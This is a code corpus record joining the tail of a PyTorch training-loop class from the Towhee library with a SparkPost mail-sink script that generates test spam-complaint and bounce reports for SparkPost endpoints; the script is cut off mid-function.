training_config = TrainingConfig(output_dir=output_dir)
self.configs = training_config
if model is None:
raise RuntimeError("`Trainer` requires either a `model` or `model_init` argument")
if isinstance(train_dataset, Dataset):
self.train_dataset = train_dataset
elif isinstance(train_dataset, TowheeDataSet):
self.train_dataset = train_dataset.dataset
self.eval_dataset = eval_dataset
self.model = model
self.model_card = model_card
self.optimizer = None
self.override_optimizer = False
self.lr_scheduler_type = self.configs.lr_scheduler_type
self.lr_scheduler = None
self.lr_value = self.configs.lr
self.metric = None
self.loss = None
self.override_loss = False
self.loss_value = 0.0
self.callbacks = CallbackList()
self.loss_metric = None
self.metric_value = 0.0
self.epoch = 0
self.train_dataloader = train_dataloader
self.train_sampler = None
self.eval_dataloader = eval_dataloader
self.distributed = False
os.makedirs(self.configs.output_dir, exist_ok=True)
if not isinstance(self.model_card, ModelCard):
self.model_card = ModelCard()
if self.model_card.model_name is None:
self.model_card.model_name = type(self.model).__name__
self.model_card.model_architecture = str(self.model)
self.model_card.training_config = self.configs
def train(self, resume_checkpoint_path: Optional[str] = None):
"""
Start to train.
Args:
resume_checkpoint_path (`int`):
The path to start resume training.
"""
if self.configs.device_str == "cuda":
self.distributed = True
self._spawn_train_process(resume_checkpoint_path)
else:
self.distributed = False
self.run_train(resume_checkpoint_path)
def _spawn_train_process(self, resume_checkpoint_path: Optional[str]):
# world_size = torch.cuda.device_count()
# mp.spawn(self.run_train,
# args=(world_size, resume_checkpoint_path),
# nprocs=world_size, # opt.world_size,
# join=True)
process_list = []
world_size = self.configs.n_gpu
if world_size < 1:
trainer_log.warning("when `device_str` is `cuda`, `n_gpu` must be a positive int number.")
for rank in range(world_size):
process = Process(target=self.run_train, args=(resume_checkpoint_path, rank, world_size))
process.start()
process_list.append(process)
for process in process_list:
process.join()
def _init_distributed(self, rank: int, world_size: int):
if self.distributed:
if torch.cuda.is_available() is False:
raise EnvironmentError("not find GPU device for training.")
os.environ["MASTER_ADDR"] = "localhost"
os.environ["MASTER_PORT"] = "12355"
trainer_log.warning("_init_distributed(), rank=%s", rank)
torch.cuda.set_device(rank)
dist_backend = "nccl"
dist_url = "env://"
trainer_log.warning("| distributed init (rank %s): %s", rank, dist_url)
dist.init_process_group(backend=dist_backend, init_method=dist_url,
world_size=world_size, rank=rank)
dist.barrier()
def _load_before_train(self, resume_checkpoint_path: Optional[str], rank: Optional[int]):
# sync_bn = self.configs.sync_bn
if resume_checkpoint_path is not None:
# weights_dict = torch.load(weights_path, map_location=device)
# load_weights_dict = {k: v for k, v in weights_dict.items()
# if model.state_dict()[k].numel() == v.numel()}
# model.load_state_dict(load_weights_dict, strict=False)
self.load(resume_checkpoint_path)
else: # if using multi gpu and not resume, must keep model replicas in all processes are the same
if self.distributed:
# checkpoint_path = os.path.join(tempfile.gettempdir(), TEMP_INIT_WEIGHTS)
checkpoint_path = TEMP_INIT_WEIGHTS
if rank == 0:
torch.save(self.model.state_dict(), checkpoint_path)
dist.barrier()
self.model.load_state_dict(torch.load(checkpoint_path, map_location=self.configs.device))
if self.distributed:
self.model = torch.nn.parallel.DistributedDataParallel(self.model, device_ids=[rank])
# if sync_bn:
# self.model = torch.nn.SyncBatchNorm.convert_sync_batchnorm(self.model).to(self.configs.device)
def _create_logs(self):
logs = {"global_step": 0, "epoch": self.epoch}
if self.configs.eval_strategy not in no_option_list:
logs["eval_global_step"] = 0
return logs
def prepare_inputs(self, inputs: Any):
return send_to_device(inputs, self.configs.device)
def run_train(self, resume_checkpoint_path: str = None, rank: int = None, world_size: int = None):
"""
Main training entry point.
It is not recommended for users to use it unless over rewriting Trainer.
Instead, it is recommended to use `trainer.train()` to start training.
Args:
resume_checkpoint_path (`str`):
Last checkpoint path.
rank (`int`):
Process rank when using multi gpus.
world_size (`int`):
Total processes count.
"""
set_seed(self.configs.seed)
self._init_distributed(rank, world_size)
self.model = self.model.to(self.configs.device)
model = self.model
self.trainercontrol = TrainerControl()
self._load_before_train(resume_checkpoint_path, rank)
# Keeping track whether we can can len() on the dataset or not
# train_dataset_is_sized = isinstance(self.train_dataset, collections.abc.Sized)
train_dataloader = self.get_train_dataloader()
total_train_batch_size = self.configs.train_batch_size
# if train_dataset_is_sized:
num_update_steps_per_epoch = len(train_dataloader)
num_update_steps_per_epoch = max(num_update_steps_per_epoch, 1)
train_last_epoch = self.epoch
num_train_epochs = math.ceil(self.configs.epoch_num - train_last_epoch)
num_train_steps = math.ceil(num_train_epochs * num_update_steps_per_epoch)
self.setup_before_train(num_training_steps=num_train_steps, init_lr=self.lr_value)
trainer_log.info("***** Running training *****")
trainer_log.info(" Num Epochs = %d", num_train_epochs)
trainer_log.info(" Total train batch size = %d", total_train_batch_size)
trainer_log.info("****************************")
if is_main_process():
trainer_log.warning(self.configs)
logs = self._create_logs()
self.callbacks.on_train_begin(logs)
for epoch in range(train_last_epoch + 1, self.configs.epoch_num + 1):
self.epoch = logs["epoch"] = epoch
self.set_train_mode(model)
self._reset_controller()
self.optimizer.zero_grad()
if self.distributed:
self.train_sampler.set_epoch(self.epoch)
# batch_loss_sum = 0.0
self.callbacks.on_epoch_begin(self.epoch, logs)
self.loss_metric.reset()
self.metric.reset()
for step, inputs in enumerate(train_dataloader):
self.callbacks.on_train_batch_begin(inputs, logs)
inputs = self.prepare_inputs(inputs)
step_logs = self.train_step(model, inputs) # , train_dataloader)
logs["lr"] = self.lr_scheduler.get_lr()[0]
logs["global_step"] += 1
logs.update(step_logs)
self.callbacks.on_train_batch_end(tuple(inputs), logs)
self._may_evaluate(model, logs, step)
self._may_evaluate(model, logs)
self.callbacks.on_epoch_end(self.epoch, logs)
self.loss_value = logs["epoch_loss"]
self.metric_value = logs["epoch_metric"]
self.lr_value = logs["lr"]
self._create_training_summary(
finetuned_from=resume_checkpoint_path,
resumed_from_epoch=train_last_epoch if train_last_epoch != 0 else None,
num_train_epochs=self.epoch - train_last_epoch,
current_epoch=self.epoch,
end_lr=self.lr_value,
loss={"type": self.configs.loss, "value": round(self.loss_value, 3)},
metric={"type": self.configs.metric, "value": round(self.metric_value, 3)}
)
if self.trainercontrol.should_training_stop:
break
if self.trainercontrol.should_save:
self.save(
path=os.path.join(self.configs.output_dir, "epoch_" + str(self.epoch)),
overwrite=self.configs.overwrite_output_dir
)
trainer_log.info("\nTraining completed.\n")
self._cleanup_distributed(rank)
self.callbacks.on_train_end(logs)
self.save(
path=os.path.join(self.configs.output_dir, "final_epoch"),
overwrite=self.configs.overwrite_output_dir
)
def set_train_mode(self, model: nn.Module):
"""
Convert the model to training mode.
Args:
model (`nn.Module`):
"""
model.train()
if self.configs.freeze_bn:
model.apply(freeze_bn)
def _create_training_summary(self, **kwargs):
training_summary = dict(kwargs)
self.model_card.training_summary = training_summary
def _may_evaluate(self, model: nn.Module, logs: dict, step: int = -1):
if step != -1: # step end
if self.configs.eval_strategy in ["step", "steps"]:
assert self.configs.eval_steps > 0, "self.configs.eval_steps must be a positive int number"
if self.configs.eval_strategy in ["step", "steps"] and step % self.configs.eval_steps == 0:
eval_logs = self.evaluate(model, logs)
logs.update(eval_logs)
else: # epoch end
if self.configs.eval_strategy in ["epoch", "eval_epoch"]:
eval_logs = self.evaluate(model, logs)
logs.update(eval_logs)
@torch.no_grad()
def evaluate_step(self, model: nn.Module, inputs: Any) -> dict:
"""
One batch step when evaluating.
Args:
model (`nn.Module`):
Pytorch model.
inputs (`Any`):
Input Tensor or any kind of collection made up by tensors.
Returns:
(`dict`)
Evaluate logs dict.
"""
inputs = self.prepare_inputs(inputs)
step_loss = self.compute_loss(model, inputs)
step_loss = reduce_value(step_loss, average=True)
step_loss = step_loss.detach()
loss_metric, epoch_metric = self.update_metrics(model, inputs, step_loss, training=False)
step_logs = {"eval_step_loss": step_loss.item(), "eval_epoch_loss": loss_metric,
"eval_epoch_metric": epoch_metric}
return step_logs
@torch.no_grad()
def update_metrics(self, model: nn.Module, inputs: Any, step_loss: torch.Tensor, training: bool = True) -> tuple:
"""
Update the loss and metric in one epoch.
When restart a new epoch, the epoch_loss and epoch metric will be clear.
Args:
model (`nn.Module`):
Pytorch model.
inputs (`Any`):
Torch tensor or any kind of collection made up by tensors.
step_loss (`torch.Tensor`):
One batch step loss.
training (`bool`):
Whether it's training mode now.
Returns:
(`tuple`)
Epoch loss and epoch metric.
"""
self.loss_metric.update(send_to_device(step_loss, self.configs.device))
loss_metric = self.loss_metric.compute().item()
if self.configs.eval_strategy == "eval_epoch" and training:
epoch_metric = 0
else:
epoch_metric = self.compute_metric(model, inputs)
return loss_metric, epoch_metric
@torch.no_grad()
def compute_metric(self, model: nn.Module, inputs: Any) -> float:
"""
Compute the step metric.
It is recommended to subclass `Trainer` and override this method when deal with custom metric in custom task.
When it is overridden, another method `compute_loss()` often needs to be overridden.
Args:
model (`nn.Module`):
Pytorch model.
inputs (`Any`):
Input tensor collection.
Returns:
(`float`)
Epoch average metric.
"""
model.eval()
epoch_metric = None
labels = inputs[1]
outputs = model(inputs[0])
if self.metric is not None:
self.metric.update(send_to_device(outputs, self.configs.device),
send_to_device(labels, self.configs.device))
epoch_metric = self.metric.compute().item()
return epoch_metric
@torch.no_grad()
def evaluate(self, model: nn.Module, logs: dict) -> dict:
"""
Evaluate the model.
Args:
model (`nn.Module`):
Pytorch model.
logs (`dict`):
Logs dict.
Returns:
(`dict`)
The new logs dict with evaluate values.
"""
model.eval()
self.callbacks.on_eval_begin(logs)
self.metric.reset()
eval_dataloader = self.get_eval_dataloader()
if eval_dataloader is None:
trainer_log.warning("eval_dataloader is None!")
return logs
for _, inputs in enumerate(eval_dataloader):
self.callbacks.on_eval_batch_begin(inputs, logs)
inputs = send_to_device(inputs, self.configs.device)
step_logs = self.evaluate_step(model, inputs)
logs.update(step_logs)
self.callbacks.on_eval_batch_end(tuple(inputs), logs)
logs["eval_global_step"] += 1
self.callbacks.on_eval_end(logs)
return logs
@torch.no_grad()
def predict(self, inputs: Any) -> Any:
"""
Do prediction. The eval mode model passes in the input value and get the outputs.
Args:
inputs (`Any`):
Inference inputs by the model.
Returns:
(`Any`)
Output result.
"""
self.model.eval()
return self.model(inputs)
def train_step(self, model: nn.Module, inputs: Any) -> dict:
"""
The training batch step.
It contains computing step loss, loss backpropagation, doing step optimization, computing metric.
Args:
model (`nn.Module`):
Pytorch model.
inputs (`Any`):
Pytorch tensor or tensor collection.
Returns:
(`dict`)
Step logs which contains the step loss and metric infos.
"""
step_loss = self.compute_loss(model, inputs)
step_loss = reduce_value(step_loss, average=True)
step_loss.backward()
step_loss = step_loss.detach()
loss_metric, epoch_metric = self.update_metrics(model, inputs, step_loss, training=True)
self.optimizer.step()
self.lr_scheduler.step()
self.optimizer.zero_grad()
step_logs = {"step_loss": step_loss.item(), "epoch_loss": loss_metric, "epoch_metric": epoch_metric}
return step_logs
def _cleanup_distributed(self, rank: int):
if self.distributed:
if rank == 0:
if os.path.exists(TEMP_INIT_WEIGHTS) is True:
os.remove(TEMP_INIT_WEIGHTS)
dist.destroy_process_group()
def compute_loss(self, model: nn.Module, inputs: Any):
"""
Compute the step loss.
It is recommended to subclass `Trainer` and override this method when deal with custom loss in custom task.
When it is overridden, another method `compute_metric()` often needs to be overridden.
Args:
model (`nn.Module`):
Pytorch model.
inputs (`Any`):
Model inputs when training.
Returns:
(`Any`)
Loss values with `grad_fn`.
"""
self.set_train_mode(model)
labels = inputs[1]
outputs = model(inputs[0])
loss = self.loss(outputs, labels)
return loss
def push_model_to_hub(self):
# todo
pass
def add_callback(self, callback: Callback, singleton: bool = True):
"""
Users can add their custom callbacks into the trainer.
Args:
callback (`Callback`):
Custom callback.
singleton (`bool`):
Whether this kind of callback is singleton.
When singleton, the same class instance in `trainer.callbacks` will be replaced.
"""
self.callbacks.add_callback(callback, singleton)
def set_optimizer(self, optimizer: optim.Optimizer, optimizer_name: str = None):
"""
Set custom optimizer
Args:
optimizer (`optim.Optimizer`):
User's custom optimizer instance.
optimizer_name (`str`):
The optimizer string in training config, if it is `None`, the string will be a default value.
Examples:
>>> from towhee.trainer.trainer import Trainer
>>> from typing import Optional, Callable
>>> from torch import optim
>>> import torchvision.models as models
>>> model = models.resnet18()
>>> trainer = Trainer(model)
2022-03-01 17:22:52,306 - 8614221312 - trainer.py-trainer:173 - WARNING: No `TrainingConfig` passed.
>>> class MyOptimizer(optim.Optimizer):
... def step(self, closure: Optional[Callable[[], float]]=...) -> Optional[float]:
... print('my step...')
...
>>> my_optimizer = MyOptimizer(model.parameters(), defaults={})
>>> trainer.set_optimizer(my_optimizer)
>>> type(trainer.optimizer)
<class '__main__.MyOptimizer'>
"""
self.override_optimizer = True
self.configs.optimizer = CUSTOM if optimizer_name is None else optimizer_name
self.optimizer = optimizer
def set_loss(self, loss: Any, loss_name: str = None):
"""
Set custom loss
Args:
loss (`Any`):
User's custom loss instance.
loss_name (`str`):
The loss string in training config, if it is `None`, the string will be a default value.
Examples:
>>> from towhee.trainer.trainer import Trainer
>>> import torchvision.models as models
>>> import torch
>>> model = models.resnet18()
>>> trainer = Trainer(model)
2022-03-01 17:34:36,873 - 8605304320 - trainer.py-trainer:173 - WARNING: No `TrainingConfig` passed.
>>> class MyTripletLossFunc(torch.nn.Module):
... def forward(self):
... print('forward...')
... return 0
...
>>> my_loss = MyTripletLossFunc()
>>> trainer.set_loss(my_loss)
>>> type(trainer.loss)
<class '__main__.MyTripletLossFunc'>
"""
self.override_loss = True
self.configs.loss = CUSTOM if loss_name is None else loss_name
self.loss = loss
def _get_num_workers(self):
if self.configs.dataloader_num_workers == -1:
num_workers = min([os.cpu_count(), self.configs.batch_size if self.configs.batch_size > 1 else 0, 8])
else:
num_workers = self.configs.dataloader_num_workers
if is_main_process():
trainer_log.info("num_workers=%s", num_workers)
return num_workers
def get_train_dataloader(self) -> DataLoader:
"""
Get the training dataloader.
Returns:
('Optional[DataLoader]')
The dataloader to fit data to train the model.
"""
if self.train_dataloader is not None:
return self.train_dataloader
if self.train_dataset is None:
raise ValueError("Trainer: training requires a train_dataset.")
if isinstance(self.train_dataset, TorchDataSet):
self.train_dataset = self.train_dataset.dataset
num_workers = self._get_num_workers()
# if isinstance(self.train_dataset, IterableDataset):
# return DataLoader(
# self.train_dataset,
# batch_size=self.configs.train_batch_size,
# )
if not self.distributed:
return DataLoader(
self.train_dataset,
batch_size=self.configs.train_batch_size,
shuffle=True,
num_workers=num_workers, # self.configs.dataloader_num_workers,
pin_memory=self.configs.dataloader_pin_memory,
drop_last=self.configs.dataloader_drop_last
)
else:
self.train_sampler = torch.utils.data.distributed.DistributedSampler(self.train_dataset)
train_batch_sampler = torch.utils.data.BatchSampler(
self.train_sampler, self.configs.batch_size, drop_last=True)
return torch.utils.data.DataLoader(self.train_dataset,
batch_sampler=train_batch_sampler,
num_workers=num_workers, # self.configs.dataloader_num_workers,
pin_memory=self.configs.dataloader_pin_memory,
)
def get_eval_dataloader(self) -> Optional[DataLoader]:
"""
Get the eval dataloader.
Returns:
(`Optional[DataLoader]`)
The dataloader to fit data to eval the model.
"""
if self.eval_dataloader is not None:
return self.eval_dataloader
if self.eval_dataset is None:
trainer_log.warning("Trainer: eval requires a train_dataset.")
return None
if isinstance(self.eval_dataset, TorchDataSet):
self.eval_dataset = self.eval_dataset.dataset
# if isinstance(self.eval_dataset, IterableDataset):
# return DataLoader(
# self.eval_dataset,
# batch_size=self.configs.eval_batch_size,
# )
num_workers = self._get_num_workers()
if not self.distributed:
return DataLoader(
self.eval_dataset,
batch_size=self.configs.eval_batch_size,
num_workers=num_workers, # self.configs.dataloader_num_workers,
pin_memory=self.configs.dataloader_pin_memory,
drop_last=self.configs.dataloader_drop_last
)
else:
eval_sampler = torch.utils.data.distributed.DistributedSampler(self.eval_dataset)
eval_batch_sampler = torch.utils.data.BatchSampler(
eval_sampler, self.configs.batch_size, drop_last=True)
return torch.utils.data.DataLoader(self.eval_dataset,
batch_sampler=eval_batch_sampler,
num_workers=num_workers, # self.configs.dataloader_num_workers,
pin_memory=self.configs.dataloader_pin_memory,
)
def setup_before_train(self, num_training_steps: int, init_lr: float):
"""
Setup some configs before training.
Args:
num_training_steps (`int`):
All training steps in all training loops.
init_lr (`float`):
Start learning rate.
"""
self._create_optimizer(init_lr=init_lr)
self._create_loss()
self._create_metric()
self._create_scheduler(num_training_steps=num_training_steps, optimizer=self.optimizer)
self._create_callbacks()
def _create_callbacks(self):
# print or progressbar
if self.configs.print_steps is None:
self.callbacks.add_callback(ProgressBarCallBack(total_epoch_num=self.configs.epoch_num,
train_dataloader=self.get_train_dataloader()))
else:
self.callbacks.add_callback(PrintCallBack(total_epoch_num=self.configs.epoch_num,
step_frequency=self.configs.print_steps))
# early stop
if self.configs.early_stopping not in no_option_list:
self.callbacks.add_callback(EarlyStoppingCallback(self.trainercontrol, **self.configs.early_stopping))
# save checkpoint
if self.configs.model_checkpoint not in no_option_list:
self.callbacks.add_callback(ModelCheckpointCallback(self.trainercontrol, **self.configs.model_checkpoint))
# tensorboard
if self.configs.tensorboard not in no_option_list:
summary_writer_constructor = _get_summary_writer_constructor()
if summary_writer_constructor is not None:
self.callbacks.add_callback(
TensorBoardCallBack(summary_writer_constructor,
**self.configs.tensorboard))
def _create_metric(self):
self.metric = get_metric_by_name(self.configs.metric)
self.metric.to(self.configs.device)
self.loss_metric = get_metric_by_name("MeanMetric")
self.loss_metric.to(self.configs.device)
def _create_loss(self):
if self.override_loss is True:
return
self.loss = _construct_loss_from_config(torch.nn.modules.loss, self.configs.loss)
def _create_optimizer(self, init_lr: float):
if self.override_optimizer is True:
return
self.optimizer = _construct_optimizer_from_config(
optim,
self.configs.optimizer,
model=self.model,
)
for param in self.optimizer.param_groups:
param.setdefault("initial_lr", init_lr)
self.optimizer.lr = init_lr
def _create_scheduler(self, num_training_steps: int, optimizer: torch.optim.Optimizer = None):
if isinstance(self.configs.lr_scheduler_type, str):
self.lr_scheduler = get_scheduler(
self.configs.lr_scheduler_type,
optimizer=self.optimizer if optimizer is None else optimizer,
num_warmup_steps=self.get_warmup_steps(num_training_steps),
num_training_steps=num_training_steps,
)
else:
self.configs.lr_scheduler_type["optimizer"] = optimizer
self.lr_scheduler = _construct_scheduler_from_config(torch.optim.lr_scheduler,
self.configs.lr_scheduler_type)
return self.lr_scheduler
def get_warmup_steps(self, num_training_steps: int) -> int:
"""
Get number of steps used for a linear warmup.
Args:
num_training_steps (`int`):
All training steps when training.
Returns:
(`int`)
Warmup steps.
"""
warmup_steps = (
self.configs.warmup_steps if self.configs.warmup_steps > 0 else math.ceil(
num_training_steps * self.configs.warmup_ratio)
)
return warmup_steps
def load(self, path: str):
"""
Load a model from the path.
Args:
path (`str`):
The folder path containing the model's checkpoints.
"""
state_path = Path(path).joinpath(STATE_CHECKPOINT_NAME)
model_path = Path(path).joinpath(MODEL_NAME)
# modelcard_path = Path(path).joinpath(MODEL_CARD_NAME)
trainer_log.info("Loading from previous checkpoint: %s", model_path)
state_checkpoint = torch.load(state_path, map_location=self.configs.device)
model_checkpoint = torch.load(model_path, map_location=self.configs.device)
self.model.load_state_dict(model_checkpoint)
if isinstance(self.optimizer, Optimizer) and state_checkpoint["optimizer_state_dict"]:
self.optimizer.load_state_dict(state_checkpoint["optimizer_state_dict"])
if self.lr_scheduler and state_checkpoint["lr_scheduler_state_dict"]:
self.lr_scheduler.load_state_dict(state_checkpoint["lr_scheduler_state_dict"])
if "end_lr" not in state_checkpoint:
return 0
self.lr_value = state_checkpoint["end_lr"]
if "epoch" not in state_checkpoint:
return 0
self.epoch = state_checkpoint["epoch"]
self.loss_value = state_checkpoint["loss_value"]
self.metric_value = state_checkpoint["metric_value"]
def save(self, path, overwrite=True):
"""
Save the checkpoint information in a folder.
Args:
path (`str`):
The folder path containing the model's checkpoints.
overwrite (`bool`):
If True, it will overwrite the same name path when existing.
Raises:
(`FileExistsError`)
If `overwrite` is False, when there already exists a path, it will raise Error.
"""
if is_main_process():
if not overwrite:
if Path(path).exists():
raise FileExistsError("File already exists: ", str(Path(path).resolve()))
Path(path).mkdir(exist_ok=True)
state_path = Path(path).joinpath(STATE_CHECKPOINT_NAME)
model_path = Path(path).joinpath(MODEL_NAME)
modelcard_path = Path(path).joinpath(MODEL_CARD_NAME)
trainer_log.info("save model_path: %s", model_path)
optimizer_state_dict = None
lr_scheduler_state_dict = None
if isinstance(self.optimizer, Optimizer): # if created
optimizer_state_dict = self.optimizer.state_dict()
if self.lr_scheduler is not None:
lr_scheduler_state_dict = self.lr_scheduler.state_dict()
torch.save({
"epoch": self.epoch,
"optimizer_state_dict": optimizer_state_dict,
"lr_scheduler_state_dict": lr_scheduler_state_dict,
"loss_value": self.loss_value,
"metric_value": self.metric_value,
"end_lr": self.lr_value
}, state_path)
torch.save(self.model.state_dict(), model_path)
if isinstance(self.model_card, ModelCard):
self.model_card.save_model_card(modelcard_path)
else:
trainer_log.warning("model card is None.")
def _reset_controller(self):
self.trainercontrol.should_save = False
self.trainercontrol.should_training_stop = False
self.trainercontrol.should_log = False
self.trainercontrol.should_evaluate = False
self.trainercontrol.should_epoch_stop = False
|
consume-mail.py
|
#!/usr/bin/env python3
# Consume mail received from PowerMTA
# command-line params may also be present, as per PMTA Users Guide "3.3.12 Pipe Delivery Directives"
#
# Author: Steve Tuck. (c) 2018 SparkPost
#
# Pre-requisites:
# pip3 install requests, dnspython
#
import os, email, time, glob, requests, dns.resolver, smtplib, configparser, random, argparse, csv, re
import threading, queue
from html.parser import HTMLParser
# workaround as per https://stackoverflow.com/questions/45124127/unable-to-extract-the-body-of-the-email-file-in-python
from email import policy
from webReporter import Results, timeStr
from urllib.parse import urlparse
from datetime import datetime
from bouncerate import nWeeklyCycle
from common import readConfig, configFileName, createLogger, baseProgName, xstr
# -----------------------------------------------------------------------------
# FBL and OOB handling
# -----------------------------------------------------------------------------
ArfFormat = '''From: {fblFrom}
Subject: FW: FBL test
To: {fblTo}
MIME-Version: 1.0
Content-Type: multipart/report; report-type=feedback-report;
boundary="{boundary}"
--{boundary}
Content-Type: text/plain; charset="US-ASCII"
Content-Transfer-Encoding: 7bit
This is an email abuse report for an email message
received from IP {peerIP} on {mailDate}.
For more information about this format please see
http://www.mipassoc.org/arf/.
--{boundary}
Content-Type: message/feedback-report
Feedback-Type: abuse
User-Agent: consume-mail.py/1.0
Version: 1.0
Original-Mail-From: {origFrom}
Original-Rcpt-To: {origTo}
Arrival-Date: {mailDate}
Source-IP: {peerIP}
Reported-Domain: {returnPath}
Reported-Uri: mailto:{origTo}
Removal-Recipient: {origTo}
--{boundary}
Content-Type: message/rfc822
{rawMsg}
--{boundary}--
'''
def buildArf(fblFrom, fblTo, rawMsg, msfbl, returnPath, origFrom, origTo, peerIP, mailDate):
boundary = '_----{0:d}'.format(int(time.time()))
domain = fblFrom.split('@')[1]
msg = ArfFormat.format(fblFrom=fblFrom, fblTo=fblTo, rawMsg=rawMsg, boundary=boundary, returnPath=returnPath,
domain=domain, msfbl=msfbl, origFrom=origFrom, origTo=origTo, peerIP=peerIP, mailDate=mailDate)
return msg
OobFormat = '''From: {oobFrom}
Subject: Returned mail: see transcript for details
Auto-Submitted: auto-generated (failure)
To: {oobTo}
Content-Type: multipart/report; report-type=delivery-status;
boundary="{boundary}"
This is a MIME-encapsulated message
--{boundary}
The original message was received at {mailDate}
from {toDomain} [{peerIP}]
----- The following addresses had permanent fatal errors -----
<{oobFrom}>
(reason: 550 5.0.0 <{oobFrom}>... User unknown)
----- Transcript of session follows -----
... while talking to {toDomain}:
>>> DATA
<<< 550 5.0.0 <{oobFrom}>... User unknown
550 5.1.1 <{oobFrom}>... User unknown
<<< 503 5.0.0 Need RCPT (recipient)
--{boundary}
Content-Type: message/delivery-status
Reporting-MTA: dns; {fromDomain}
Received-From-MTA: DNS; {toDomain}
Arrival-Date: {mailDate}
Final-Recipient: RFC822; {oobFrom}
Action: failed
Status: 5.0.0
Remote-MTA: DNS; {toDomain}
Diagnostic-Code: SMTP; 550 5.0.0 <{oobFrom}>... User unknown
Last-Attempt-Date: {mailDate}
--{boundary}
Content-Type: message/rfc822
{rawMsg}
--{boundary}--
'''
def buildOob(oobFrom, oobTo, rawMsg, peerIP, mailDate):
boundary = '_----{0:d}'.format(int(time.time()))
fromDomain = oobFrom.split('@')[1]
toDomain = oobTo.split('@')[1]
msg = OobFormat.format(oobFrom=oobFrom, oobTo=oobTo, boundary=boundary,
toDomain=toDomain, fromDomain=fromDomain, rawMsg=rawMsg, mailDate=mailDate, peerIP=peerIP)
return msg
# Serch for most preferred MX. Naive implementation in that we only try one MX, the most preferred
def findPreferredMX(a):
assert len(a) > 0
myPref = a[0].preference
myExchange = a[0].exchange.to_text()[:-1] # Take first one in the list, remove trailing '.'
for i in range(1, len(a)):
if a[i].preference < myPref:
myPref = a[i].preference
myExchange = a[i].exchange.to_text()[:-1]
return myExchange
# Avoid creating backscatter spam https://en.wikipedia.org/wiki/Backscatter_(email). Check that returnPath points to a known host.
# If valid, returns the (single, preferred, for simplicity) MX and the associated To: addr for FBLs.
def mapRP_MXtoSparkPostFbl(returnPath):
rpDomainPart = returnPath.split('@')[1]
try:
# Will throw exception if not found
mx = findPreferredMX(dns.resolver.query(rpDomainPart, 'MX'))
except dns.exception.DNSException:
try:
# Fall back to using A record - see https://tools.ietf.org/html/rfc5321#section-5
answers = dns.resolver.query(rpDomainPart, 'A')
if answers:
mx = rpDomainPart
else:
return None, None
except dns.exception.DNSException:
return None, None
if mx.endswith('smtp.sparkpostmail.com'): # SparkPost US
fblTo = 'fbl@sparkpostmail.com'
elif mx.endswith('e.sparkpost.com'): # SparkPost Enterprise
tenant = mx.split('.')[0]
fblTo = 'fbl@' + tenant + '.mail.e.sparkpost.com'
elif mx.endswith('smtp.eu.sparkpostmail.com'): # SparkPost EU
fblTo = 'fbl@eu.sparkpostmail.com'
elif mx.endswith('signalsdemo.trymsys.net'): # SparkPost CST demo server domains (general)
fblTo = 'fbl@fbl.' + mx
else:
return None, None
return mx, fblTo # Valid
def getPeerIP(rx):
"""
Extract peer IP address from Received: header
:param rx: email.header
:return: str
"""
peerIP = re.findall('\([0-9\.]*\)', rx)
if len(peerIP) == 1:
peerIP = peerIP[0].lstrip('(').rstrip(')')
# tbh this doesn't mean much .. it's the inside (private) IP address of the ELB feeding in traffic
else:
peerIP = '127.0.0.1' # set a default value
return peerIP
# Generate and deliver an FBL response (to cause a spam_complaint event in SparkPost)
# Based on https://github.com/SparkPost/gosparkpost/tree/master/cmd/fblgen
#
def fblGen(mail, shareRes):
returnPath = addressPart(mail['Return-Path'])
if not returnPath:
shareRes.incrementKey('fbl_missing_return_path')
return '!Missing Return-Path:'
elif not mail['to']:
shareRes.incrementKey('fbl_missing_to')
return '!Missing To:'
else:
fblFrom = addressPart(mail['to'])
mx, fblTo = mapRP_MXtoSparkPostFbl(returnPath)
if not mx:
shareRes.incrementKey('fbl_return_path_not_sparkpost')
return '!FBL not sent, Return-Path not recognized as SparkPost'
else:
origFrom = str(mail['from'])
origTo = str(mail['to'])
peerIP = getPeerIP(mail['Received'])
mailDate = mail['Date']
arfMsg = buildArf(fblFrom, fblTo, mail, mail['X-MSFBL'], returnPath, origFrom, origTo, peerIP, mailDate)
try:
# Deliver an FBL to SparkPost using SMTP direct, so that we can check the response code.
with smtplib.SMTP(mx) as smtpObj:
smtpObj.sendmail(fblFrom, fblTo, arfMsg) # if no exception, the mail is sent (250OK)
shareRes.incrementKey('fbl_sent')
return 'FBL sent,to ' + fblTo + ' via ' + mx
except Exception as err:
shareRes.incrementKey('fbl_smtp_error')
return '!FBL endpoint returned error: ' + str(err)
# Generate and deliver an OOB response (to cause a out_of_band event in SparkPost)
# Based on https://github.com/SparkPost/gosparkpost/tree/master/cmd/oobgen
def oobGen(mail, shareRes):
returnPath = addressPart(mail)
if not returnPath:
shareRes.incrementKey('oob_missing_return_path')
return '!Missing Return-Path:'
elif not mail['to']:
shareRes.incrementKey('oob_missing_to')
return '!Missing To:'
else:
mx, _ = mapRP_MXtoSparkPostFbl(returnPath)
if not mx:
shareRes.incrementKey('oob_return_path_not_sparkpost')
return '!OOB not sent, Return-Path ' + returnPath + ' does not have a valid MX'
else:
# OOB is addressed back to the Return-Path: address, from the inbound To: address (i.e. the sink)
oobTo = returnPath
oobFrom = addressPart(mail['To'])
peerIP = getPeerIP(mail['Received'])
mailDate = mail['Date']
oobMsg = buildOob(oobFrom, oobTo, mail, peerIP, mailDate)
try:
# Deliver an OOB to SparkPost using SMTP direct, so that we can check the response code.
with smtplib.SMTP(mx) as smtpObj:
smtpObj.sendmail(oobFrom, oobTo, oobMsg) # if no exception, the mail is sent (250OK)
shareRes.incrementKey('oob_sent')
return 'OOB sent,from {} to {} via {}'.format(oobFrom, oobTo, mx)
except Exception as err:
shareRes.incrementKey('oob_smtp_error')
return '!OOB endpoint returned error: ' + str(err)
# -----------------------------------------------------------------------------
# Open and Click handling
# -----------------------------------------------------------------------------
# Heuristic for whether this is really SparkPost: identifies itself in Server header
# if domain in allowlist, then skip the checks
def isSparkPostTrackingEndpoint(s, url, shareRes, openClickTimeout, trackingDomainsAllowlist):
err = None
scheme, netloc, _, _, _, _ = urlparse(url)
if netloc in trackingDomainsAllowlist:
return True, err
baseurl = scheme + '://' + netloc
# optimisation - check if we already know this is SparkPost or not
known = shareRes.getKey(baseurl)
if known:
known_bool = (known == b'1')
if not known_bool:
err = '!Tracking domain ' + baseurl + ' blocked'
return known_bool, err # response is Bytestr, compare back to a Boolean
else:
# Ping the path prefix for clicks
r = s.get(baseurl + '/f/a', allow_redirects=False, timeout=openClickTimeout)
isSparky = r.headers.get('Server') == 'msys-http'
if not isSparky:
err = url + ',status_code ' + str(r.status_code)
# NOTE redis-py now needs data passed in bytestr
